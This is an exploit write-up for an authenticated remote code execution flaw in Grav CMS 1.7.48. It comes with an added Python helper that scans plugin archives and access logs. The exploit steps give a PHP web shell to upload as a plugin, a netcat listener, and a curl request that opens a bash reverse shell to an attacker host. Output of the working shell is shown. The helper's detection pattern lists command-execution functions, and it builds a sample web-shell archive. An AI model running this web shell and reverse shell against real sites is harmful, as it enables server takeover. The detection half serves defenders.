Grav CMS 1.7.48 – Remote Code Execution (RCE)

Categories: PHP WebApps

Proof of Concept (PoC)

poc.sh
# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286

# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a plugin archive whose PHP file contains arbitrary code; Grav loads that file, so the code runs
on the server as the web server user.

# Steps to Reproduce:

1. Start a listener on your attack machine:
   nc -lvnp 4444

2. Log in to the Grav Admin Panel as an administrator:
   https://<target>/admin

3. Navigate to:
   Tools → Direct Install

4. Upload a ZIP archive containing the following structure:

   evilplugin/
   ├── evilplugin.php        # Contains: <?php shell_exec($_GET['cmd']); ?>
   └── blueprints.yaml       # Minimal content to pass plugin validation

5. Request the site with the cmd parameter to trigger the payload (host.docker.internal is the
   attack host as seen from a Docker test container; substitute the address of your listener):

   curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/

6. Observe the reverse shell:

   $ nc -lvnp 4444
   Listening on 0.0.0.0 4444
   Connection received on <target-ip>
   www-data@target:/var/www/html$ whoami
   www-data

# Notes:
- Authentication is required (admin-level).
- The vulnerability exists due to insufficient validation in the plugin upload feature (`/admin/tools/direct-install`).
- Exploitation yields code execution as the web server user (www-data in the session above), which may lead to full system compromise.
- Because Grav plugins are PHP executed in-process, any account that can reach Direct Install can reach this; admin credentials and the `/admin` route are the effective control boundary.

# References:
- https://github.com/getgrav/grav
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50286

# Disclaimer:
This exploit is provided for educational and research purposes only.
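Two checks a defender would want after reading the steps above, as an added example that is not code from the PoC author or from the Grav project: a scan of a plugin archive for PHP that calls command-execution or code-evaluation functions (the shape of evilplugin.php in step 4, including the path-traversal case a ZIP can also carry), and extraction of Direct Install uploads from web server access logs. All sample inputs are constructed inline; the blueprints.yaml keys and the exact POST path are assumptions, not taken from the advisory.

```python
"""Triage helpers for the Grav Direct Install upload path (added example)."""
import io
import re
import zipfile

# PHP functions whose presence in a third-party plugin warrants manual review.
DANGEROUS_CALLS = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
# A request superglobal on the same line is the classic web-shell shape.
TAINTED_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Assumed upload endpoint; the advisory names /admin/tools/direct-install.
DIRECT_INSTALL_PATH = "/admin/tools/direct-install"


def scan_plugin_archive(data: bytes) -> dict:
    """Inspect a plugin ZIP given as bytes; return members, findings, blueprints presence."""
    members, findings, has_blueprints = [], [], False
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            members.append(name)
            # Absolute or traversing member names would land outside user/plugins/.
            if name.startswith("/") or ".." in name.split("/"):
                findings.append((name, "unsafe member path"))
            if name.endswith("blueprints.yaml"):
                has_blueprints = True
            if not name.lower().endswith(".php"):
                continue
            src = zf.read(info).decode("utf-8", errors="replace")
            for lineno, line in enumerate(src.splitlines(), 1):
                if DANGEROUS_CALLS.search(line):
                    kind = "command/eval call"
                    if TAINTED_INPUT.search(line):
                        kind += " fed from request input"
                    findings.append((f"{name}:{lineno}", kind))
    return {"members": members, "findings": findings, "has_blueprints": has_blueprints}


def find_direct_install_uploads(log_lines) -> list:
    """Return (client, timestamp, status) for every POST to the Direct Install endpoint."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, ts, method, path, status = m.groups()
        if method == "POST" and path.split("?")[0].startswith(DIRECT_INSTALL_PATH):
            hits.append((client, ts, int(status)))
    return hits


def build_sample_archive(malicious: bool = True) -> bytes:
    """Constructed sample: the two-file layout from step 4, built in memory.

    The blueprints.yaml keys below are an assumption about what Grav expects.
    """
    php = (
        "<?php shell_exec($_GET['cmd']); ?>\n" if malicious
        else "<?php\nnamespace Grav\\Plugin;\nuse Grav\\Common\\Plugin;\nclass DemoPlugin extends Plugin {}\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("demo/demo.php", php)
        zf.writestr("demo/blueprints.yaml", "name: Demo\ntype: plugin\nversion: 1.0.0\n")
    return buf.getvalue()


# Constructed access log lines: a login, the upload, and the later trigger request.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Aug/2025:10:01:02 +0000] "POST /admin/login HTTP/1.1" 302 0',
    '203.0.113.7 - - [07/Aug/2025:10:02:15 +0000] "POST /admin/tools/direct-install HTTP/1.1" 302 0',
    '198.51.100.9 - - [07/Aug/2025:10:03:00 +0000] "GET /?cmd=id HTTP/1.1" 200 4012',
]

if __name__ == "__main__":
    for where, what in scan_plugin_archive(build_sample_archive())["findings"]:
        print(f"{where}: {what}")
    for client, ts, status in find_direct_install_uploads(SAMPLE_LOG):
        print(f"Direct Install upload from {client} at {ts} (HTTP {status})")
```

The archive scan is a review aid, not a gate: a determined admin can obfuscate the call, so the durable controls remain who holds admin credentials and alerting on the upload endpoint itself. Point find_direct_install_uploads at the real access log and correlate each hit with new directories under user/plugins/.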
